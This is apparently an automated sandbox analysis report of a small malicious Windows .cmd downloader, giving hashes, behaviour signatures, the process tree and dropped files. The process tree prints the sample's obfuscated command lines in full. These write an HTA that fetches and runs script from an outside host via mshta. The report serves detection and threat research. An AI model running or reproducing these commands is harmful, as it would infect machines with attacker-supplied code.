Analysis
- max time kernel: 117s
- max time network: 123s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 14-01-2022 07:00
Static task: static1
Behavioral task: behavioral1
- Sample: 536749.742.67513.78924_208.69621.4895824ã.cmd
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 536749.742.67513.78924_208.69621.4895824ã.cmd
- Resource: win10-en-20211208
General
- Target: 536749.742.67513.78924_208.69621.4895824ã.cmd
- Size: 344B
- MD5: 19461ec95d2ed8da4cc2c4d9550aa125
- SHA1: 16a95e645237cfcf43e1ac67608783513e7dbfe3
- SHA256: 758416f5eaeb77570a9529e928cf21a38e803664412a198452719a8b9e994d19
- SHA512: 4e4d8e9fe6969546c188f02c28525bcaf589801c72054e2e116d05189e6004283a395110717b8936d520ebedc4e9b3b49bc6327d395689c186e695942a03adbe
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  Processes (flow, pid, process):
  - flow 5, pid 1036, mshta.exe
  - flow 7, pid 1036, mshta.exe
  - flow 9, pid 1036, mshta.exe
- Modifies Internet Explorer settings
  Processes (description, ioc, process):
  - Key created, \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main, mshta.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (description, pid, process, target process); each entry is reported three times:
  - PID 760 wrote to memory of 380 (pid 760, cmd.exe -> cmd.exe)
  - PID 380 wrote to memory of 268 (pid 380, cmd.exe -> cmd.exe)
  - PID 380 wrote to memory of 1488 (pid 380, cmd.exe -> cmd.exe)
  - PID 1488 wrote to memory of 772 (pid 1488, cmd.exe -> cmd.exe)
  - PID 772 wrote to memory of 1036 (pid 772, cmd.exe -> mshta.exe)
Processes
- (level 1) C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\536749.742.67513.78924_208.69621.4895824ã.cmd"
  Signatures: Suspicious use of WriteProcessMemory
  - (level 2) C:\Windows\system32\cmd.exe
    cmd /V/D/c "seT sKk=script&&seT px=mshta&&SEt AJKP=C:\Users\Public\Videos\^dOW&&SEt GSEM=^<!sKk!^>try{vfYYar c='!sKk!:';d='hfYYTtP:';GfYYetObjfYYect(c+d+'&&sET 9IF=BOTKRBOTKRa9eikr.5wyck43a9uxnu7e.cfdBOTKR?1BOTKR');}catch(e){}close();^</!sKk!^>&&sEt/^p JGDH="!GSEM:fYY=!!9IF:BOTKR=/!"<nul > !AJKP!.Hta|start /MIN CMD /c !px! !AJKP!.HtA "
    Signatures: Suspicious use of WriteProcessMemory
    - (level 3) C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" sEt/p JGDH="<script>try{var c='script:';d='hTtP:';GetObject(c+d+'//a9eikr.5wyck43a9uxnu7e.cfd/?1/');}catch(e){}close();</script>" 0<nul 1>C:\Users\Public\Videos\dOW.Hta"
    - (level 3) C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" start /MIN CMD /c mshta C:\Users\Public\Videos\dOW.HtA "
      Signatures: Suspicious use of WriteProcessMemory
      - (level 4) C:\Windows\system32\cmd.exe
        CMD /c mshta C:\Users\Public\Videos\dOW.HtA
        Signatures: Suspicious use of WriteProcessMemory
        - (level 5) C:\Windows\system32\mshta.exe
          mshta C:\Users\Public\Videos\dOW.HtA
          Signatures: Blocklisted process makes network request; Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Public\Videos\dOW.HtA
  MD5: 4493b5e3f684c33ba8ee862f2fdb9944
  SHA1: e489710719416946503438f5675da901b8ee0dd8
  SHA256: f1c703ab466011aaf49c4f2284a0a0d9c85f53095369022648d32692271ede2a
  SHA512: 3a8b5a970621eea4bab132b7ed85394d90295a93c3c834386ee3c27c6fde3c8128e08d182f7ab84759822f785fa32dd4a1b3b2e65162271deb4183b48887969a
- memory/268-56-0x0000000000000000-mapping.dmp
- memory/380-55-0x0000000000000000-mapping.dmp
- memory/772-58-0x0000000000000000-mapping.dmp
- memory/1036-59-0x0000000000000000-mapping.dmp
- memory/1488-57-0x0000000000000000-mapping.dmp